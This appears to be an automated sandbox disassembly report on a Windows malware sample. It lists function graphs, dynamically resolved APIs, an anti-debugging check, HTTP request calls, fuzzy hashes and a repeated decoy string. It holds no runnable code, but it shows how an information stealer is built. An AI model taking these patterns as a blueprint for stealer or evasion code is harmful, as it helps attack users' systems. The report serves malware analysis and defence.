                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 2127927946-2218711628
                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                    Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 752 419860-419874 call 419750 755 419a93-419af2 LoadLibraryA * 5 752->755 756 41987a-419a8e call 419780 GetProcAddress * 21 752->756 757 419af4-419b08 GetProcAddress 755->757 758 419b0d-419b14 755->758 756->755 757->758 760 419b46-419b4d 758->760 761 419b16-419b41 GetProcAddress * 2 758->761 763 419b68-419b6f 760->763 764 419b4f-419b63 GetProcAddress 760->764 761->760 765 419b71-419b84 GetProcAddress 763->765 766 419b89-419b90 763->766 764->763 765->766 767 419bc1-419bc2 766->767 768 419b92-419bbc GetProcAddress * 2 766->768 768->767
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,009E7E58), ref: 004198A1
                                    • GetProcAddress.KERNEL32(75900000,009E7E70), ref: 004198BA
                                    • GetProcAddress.KERNEL32(75900000,009E7EE8), ref: 004198D2
                                    • GetProcAddress.KERNEL32(75900000,009E7EB8), ref: 004198EA
                                    • GetProcAddress.KERNEL32(75900000,009E7ED0), ref: 00419903
                                    • GetProcAddress.KERNEL32(75900000,009E4F10), ref: 0041991B
                                    • GetProcAddress.KERNEL32(75900000,009E45A8), ref: 00419933
                                    • GetProcAddress.KERNEL32(75900000,009E45E8), ref: 0041994C
                                    • GetProcAddress.KERNEL32(75900000,009E7F00), ref: 00419964
                                    • GetProcAddress.KERNEL32(75900000,009E7F18), ref: 0041997C
                                    • GetProcAddress.KERNEL32(75900000,00A12950), ref: 00419995
                                    • GetProcAddress.KERNEL32(75900000,00A12B90), ref: 004199AD
                                    • GetProcAddress.KERNEL32(75900000,009E42C8), ref: 004199C5
                                    • GetProcAddress.KERNEL32(75900000,00A12A70), ref: 004199DE
                                    • GetProcAddress.KERNEL32(75900000,00A12A40), ref: 004199F6
                                    • GetProcAddress.KERNEL32(75900000,009E43A8), ref: 00419A0E
                                    • GetProcAddress.KERNEL32(75900000,00A12AA0), ref: 00419A27
                                    • GetProcAddress.KERNEL32(75900000,00A12BF0), ref: 00419A3F
                                    • GetProcAddress.KERNEL32(75900000,009E4468), ref: 00419A57
                                    • GetProcAddress.KERNEL32(75900000,00A12938), ref: 00419A70
                                    • GetProcAddress.KERNEL32(75900000,009E43C8), ref: 00419A88
                                    • LoadLibraryA.KERNEL32(00A12B78,?,00416A00), ref: 00419A9A
                                    • LoadLibraryA.KERNEL32(00A12B48,?,00416A00), ref: 00419AAB
                                    • LoadLibraryA.KERNEL32(00A12A58,?,00416A00), ref: 00419ABD
                                    • LoadLibraryA.KERNEL32(00A12BA8,?,00416A00), ref: 00419ACF
                                    • LoadLibraryA.KERNEL32(00A12AB8,?,00416A00), ref: 00419AE0
                                    • GetProcAddress.KERNEL32(75070000,00A12BC0), ref: 00419B02
                                    • GetProcAddress.KERNEL32(75FD0000,00A12A10), ref: 00419B23
                                    • GetProcAddress.KERNEL32(75FD0000,00A12920), ref: 00419B3B
                                    • GetProcAddress.KERNEL32(75A50000,00A12A88), ref: 00419B5D
                                    • GetProcAddress.KERNEL32(74E50000,009E46A8), ref: 00419B7E
                                    • GetProcAddress.KERNEL32(76E80000,009E4F40), ref: 00419B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00419BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12
                                    Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 0040493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,00A1B228), ref: 00404DE8
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                    • HttpOpenRequestA.WININET(00000000,00A1B218,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00404B15
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 2402878923-2180234286
                                    • Opcode ID: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                    • Opcode Fuzzy Hash: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                    Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocNameProcessUser
                                    • String ID:
                                    • API String ID: 1206570057-0
                                    • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                    • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                    • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                    • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                    Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                    • ExitProcess.KERNEL32 ref: 0040117E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                    • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                    • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                    • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6
                                    Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,009E44C8), ref: 00419C2D
                                    • GetProcAddress.KERNEL32(75900000,009E4348), ref: 00419C45
                                    • GetProcAddress.KERNEL32(75900000,00A12C80), ref: 00419C5E
                                    • GetProcAddress.KERNEL32(75900000,00A12C08), ref: 00419C76
                                    • GetProcAddress.KERNEL32(75900000,00A12C50), ref: 00419C8E
                                    • GetProcAddress.KERNEL32(75900000,00A12C98), ref: 00419CA7
                                    • GetProcAddress.KERNEL32(75900000,00A15080), ref: 00419CBF
                                    • GetProcAddress.KERNEL32(75900000,00A12CC8), ref: 00419CD7
                                    • GetProcAddress.KERNEL32(75900000,00A12CB0), ref: 00419CF0
                                    • GetProcAddress.KERNEL32(75900000,00A12C20), ref: 00419D08
                                    • GetProcAddress.KERNEL32(75900000,00A12C38), ref: 00419D20
                                    • GetProcAddress.KERNEL32(75900000,009E44E8), ref: 00419D39
                                    • GetProcAddress.KERNEL32(75900000,009E4548), ref: 00419D51
                                    • GetProcAddress.KERNEL32(75900000,009E4368), ref: 00419D69
                                    • GetProcAddress.KERNEL32(75900000,009E4568), ref: 00419D82
                                    • GetProcAddress.KERNEL32(75900000,00A190E8), ref: 00419D9A
                                    • GetProcAddress.KERNEL32(75900000,00A19100), ref: 00419DB2
                                    • GetProcAddress.KERNEL32(75900000,00A150F8), ref: 00419DCB
                                    • GetProcAddress.KERNEL32(75900000,009E4588), ref: 00419DE3
                                    • GetProcAddress.KERNEL32(75900000,00A19118), ref: 00419DFB
                                    • GetProcAddress.KERNEL32(75900000,00A19160), ref: 00419E14
                                    • GetProcAddress.KERNEL32(75900000,00A19178), ref: 00419E2C
                                    • GetProcAddress.KERNEL32(75900000,00A19130), ref: 00419E44
                                    • GetProcAddress.KERNEL32(75900000,009E4628), ref: 00419E5D
                                    • GetProcAddress.KERNEL32(75900000,00A19148), ref: 00419E75
                                    • GetProcAddress.KERNEL32(75900000,00A190D0), ref: 00419E8D
                                    • GetProcAddress.KERNEL32(75900000,00A19190), ref: 00419EA6
                                    • GetProcAddress.KERNEL32(75900000,00A18E90), ref: 00419EBE
                                    • GetProcAddress.KERNEL32(75900000,00A18E18), ref: 00419ED6
                                    • GetProcAddress.KERNEL32(75900000,00A19058), ref: 00419EEF
                                    • GetProcAddress.KERNEL32(75900000,00A18DD0), ref: 00419F07
                                    • GetProcAddress.KERNEL32(75900000,00A18F38), ref: 00419F1F
                                    • GetProcAddress.KERNEL32(75900000,00A18F08), ref: 00419F38
                                    • GetProcAddress.KERNEL32(75900000,00A14988), ref: 00419F50
                                    • GetProcAddress.KERNEL32(75900000,00A18F68), ref: 00419F68
                                    • GetProcAddress.KERNEL32(75900000,00A190B8), ref: 00419F81
                                    • GetProcAddress.KERNEL32(75900000,009E4648), ref: 00419F99
                                    • GetProcAddress.KERNEL32(75900000,00A18E00), ref: 00419FB1
                                    • GetProcAddress.KERNEL32(75900000,009E4668), ref: 00419FCA
                                    • GetProcAddress.KERNEL32(75900000,00A19040), ref: 00419FE2
                                    • GetProcAddress.KERNEL32(75900000,00A19010), ref: 00419FFA
                                    • GetProcAddress.KERNEL32(75900000,009E4688), ref: 0041A013
                                    • GetProcAddress.KERNEL32(75900000,009E42E8), ref: 0041A02B
                                    • LoadLibraryA.KERNEL32(00A18F80,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                    • LoadLibraryA.KERNEL32(00A19088,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                    • LoadLibraryA.KERNEL32(00A18ED8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                    • LoadLibraryA.KERNEL32(00A18DE8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                    • LoadLibraryA.KERNEL32(00A18F50,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                    • LoadLibraryA.KERNEL32(00A19070,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                    • LoadLibraryA.KERNEL32(00A18FE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                    • LoadLibraryA.KERNEL32(00A18FF8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                    • GetProcAddress.KERNEL32(75FD0000,009E4308), ref: 0041A0DA
                                    • GetProcAddress.KERNEL32(75FD0000,00A18EA8), ref: 0041A0F2
                                    • GetProcAddress.KERNEL32(75FD0000,00A12D40), ref: 0041A10A
                                    • GetProcAddress.KERNEL32(75FD0000,00A18E48), ref: 0041A123
                                    • GetProcAddress.KERNEL32(75FD0000,009E48A8), ref: 0041A13B
                                    • GetProcAddress.KERNEL32(735A0000,00A14FE0), ref: 0041A160
                                    • GetProcAddress.KERNEL32(735A0000,009E4868), ref: 0041A179
                                    • GetProcAddress.KERNEL32(735A0000,00A14D10), ref: 0041A191
                                    • GetProcAddress.KERNEL32(735A0000,00A18E30), ref: 0041A1A9
                                    • GetProcAddress.KERNEL32(735A0000,00A18EF0), ref: 0041A1C2
                                    • GetProcAddress.KERNEL32(735A0000,009E49E8), ref: 0041A1DA
                                    • GetProcAddress.KERNEL32(735A0000,009E49C8), ref: 0041A1F2
                                    • GetProcAddress.KERNEL32(735A0000,00A18E60), ref: 0041A20B
                                    • GetProcAddress.KERNEL32(763B0000,009E4A28), ref: 0041A22C
                                    • GetProcAddress.KERNEL32(763B0000,009E47E8), ref: 0041A244
                                    • GetProcAddress.KERNEL32(763B0000,00A18FC8), ref: 0041A25D
                                    • GetProcAddress.KERNEL32(763B0000,00A18F98), ref: 0041A275
                                    • GetProcAddress.KERNEL32(763B0000,009E4768), ref: 0041A28D
                                    • GetProcAddress.KERNEL32(750F0000,00A14F68), ref: 0041A2B3
                                    • GetProcAddress.KERNEL32(750F0000,00A14E50), ref: 0041A2CB
                                    • GetProcAddress.KERNEL32(750F0000,00A18F20), ref: 0041A2E3
                                    • GetProcAddress.KERNEL32(750F0000,009E4A48), ref: 0041A2FC
                                    • GetProcAddress.KERNEL32(750F0000,009E4988), ref: 0041A314
                                    • GetProcAddress.KERNEL32(750F0000,00A14CC0), ref: 0041A32C
                                    • GetProcAddress.KERNEL32(75A50000,00A18E78), ref: 0041A352
                                    • GetProcAddress.KERNEL32(75A50000,009E4828), ref: 0041A36A
                                    • GetProcAddress.KERNEL32(75A50000,00A12DD0), ref: 0041A382
                                    • GetProcAddress.KERNEL32(75A50000,00A18FB0), ref: 0041A39B
                                    • GetProcAddress.KERNEL32(75A50000,00A19028), ref: 0041A3B3
                                    • GetProcAddress.KERNEL32(75A50000,009E4848), ref: 0041A3CB
                                    • GetProcAddress.KERNEL32(75A50000,009E4808), ref: 0041A3E4
                                    • GetProcAddress.KERNEL32(75A50000,00A190A0), ref: 0041A3FC
                                    • GetProcAddress.KERNEL32(75A50000,00A18EC0), ref: 0041A414
                                    • GetProcAddress.KERNEL32(75070000,009E49A8), ref: 0041A436
                                    • GetProcAddress.KERNEL32(75070000,00A19598), ref: 0041A44E
                                    • GetProcAddress.KERNEL32(75070000,00A195C8), ref: 0041A466
